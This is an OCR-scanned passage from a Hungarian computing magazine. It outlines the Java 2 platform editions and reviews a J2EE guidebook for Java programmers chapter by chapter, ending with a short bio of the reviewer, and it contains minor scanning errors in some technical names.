Szűkös erőforrásal rendelkező környezetbe: beágyazott 
eszközökbe, intelligens kártyákba, set-top-boxokba szánt 
változat. 

e Java 2 Platform, Standard Edition (J2SE). 
Ez tartalmazza a nyelv és környezet alapvető és általánosan 
használatos szolgáltatásainak támogatását. Állandóan 
bővül: a korábban kiegészítőként szerepelt csomagok az 
újabb változatok szabványos részévé váltak. 

e Java 2 Platform, Enterprise Edition (J2EE). 
1998 vége óta létezik a J2SE mellett és azt kiegészítve ez az 
üzleti, a többrétegű ügyfél-kiszolgáló felépítésű alkalmazá- 
sok fejlesztését, illetve futtatását támogató készlet. A J2EE 
tulajdonképpen az üzleti alkalmazásokhoz szükséges felü- 
letek, megvalósítások gyűjteménye, amit a Sun-féle ingye- 
nes mintaimplementáció mellett egyéb termékek is megva- 
lósítanak (Sun OE, BEA WebLogic, IBM WebSphere alkal- 
mazáskiszolgálók és így tovább). A J2EF-be gyűjtött renge- 
teg részterület (és így a könyv által tárgyalt számos téma) 
külön csomagként is elérhető és függetlenül is felhasznál- 
ható. Jó példa erre az XML/XSL-módszer, a multimédia, 
vagy az, hogy nem kell a teljes kiszolgálóoldali komponens- 
modellt használnunk, ha a szervlet és a JSP-technológia 
önmagában elégséges. A J2EE-útikalauz Java-programozók- 
nak (ELITE TIK Hallgatói Alapítvány, Budapest, 2002, ISBN 
963 463 578 4) könyv célja az üzleti alkalmazások fejlesz- 
tését támogató csomag bemutatása a Java nyelvet már 
ismerő programozók számára. A könyv az ELTE-s szerző- 
gárda Java-útikalauz programozóknak című művének 
a folytatása — de ennek ismerete nem feltétel; elegendő, 
ha az olvasó járatos a Java nyelvben. Az áttekintő-bevezető 
részek után az alábbi fejezetek következnek: 

e A webes alkalmazások támogatásának gerincét képező 
szervletek és a rájuk épülő JSP (JavaServer Pages). 

e A Java-specifikus osztott objektumelérési technológia, távoli 
metódushívás (Remote Method Invocation — RMI). 

e A Java névleképezés- és katalógusinterfész (Java Naming 
and Directory Interface — IND). 

e A különböző nyelveken megírt objektumok hálózati 
elérését támogató CORBA-ról (Common Object Reguest 
Broker Architecture) írt két fejezet. 
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e A vállalati alkalmazások elemei közti üzenetkezelő 
protokoll, a Java Messaging Service. 

e . A komponensalapú osztott üzleti alkalmazások fejlesztését 

és telepítését támogató architektúra, az Enterprise JavaBeans 

(EJB) -— tekintettel az olyan szempontokra, mint a perzisz- 

tencia, a tranzakciók kezelése és a terheléselosztás stb. 

Az összetartozó, azaz vagy együtt véglegesítendő, vagy 

együtt visszavonandó műveletek tranzakciókká való össze- 

kapcsolásáról, a tranzakciók különböző környezetekben 
való támogatásáról szól a Iranzakciók, a JDBC és a JIA 

(Java Iransaction APT) című fejezet. 

e — Adatbázis-programozás. 

e A felületfüggetlen adatábrázolást és adatcserét lehetővé tevő 
XML (Extensible Markup Language, azaz kiterjeszthető jelö- 
lőnyelv). A fejezet bevezetést nyújt ebbe a fontos dokumen- 
tumformátumba és a kapcsolódó további témákba is, úgy- 
mint az XML-dokumentumok nyelvtanának megadására 
szolgáló a DID-be (Document Iype Declaration) és a kiter- 
jeszthető stíluslapnyelvbe, az XSL-be (Extensible Stylesheet 
Language), ezen belül az XML-dokumentumok átalakítására 
szolgáló részbe, az XSLI-be, a dokumentumok értelmezé- 
sére szolgáló egyszerűbben használható SAX eszközbe és 
a bonyolultabb DOM (Document Object Model) API-ba. 

e — Az elektronikus levelezést támogató JavaMail. 

e A mai webportálok körében tért nyerő audiovizuális tartal- 
mak jegyében született a Java Multimédia Framework című, 
az audio-, illetve videolejátszásra szolgáló Java Media 
Framework (JMF) nevű kiegészítő csomaggal foglalkozó 
fejezet, ami a téma fontosságára való tekintettel annak 
ellenére helyet kapott a könyvben, hogy a mondott csomag 
nem része a J2EE-nek. A fejezet egyúttal bevezetésként is 
szolgál e területre. 


A közel 700 oldalas könyv természetesen irodalomjegyzéket 
és részletes indexet is tartalmaz. A könyvhöz CD-melléklet jár, 
amelyre a J2EEB számos kulcsfontosságú összetevője mellett 
egyéb hasznos és érdekes dolgok is felkerültek, felhasználási 
szerződésének feltételei miatt a teljes JZEE sajnos nem 
szerepelhet rajta. 


Balázs Íván József 

végzettségére nézve matematikus, 
foglalkozására nézve informatikus. Régóta 
Linux-felhasználó. Jelmondata: , Családos 
ember hétközben családja eltartásán, 
hétvégén szórakoztatásán fáradozik." 








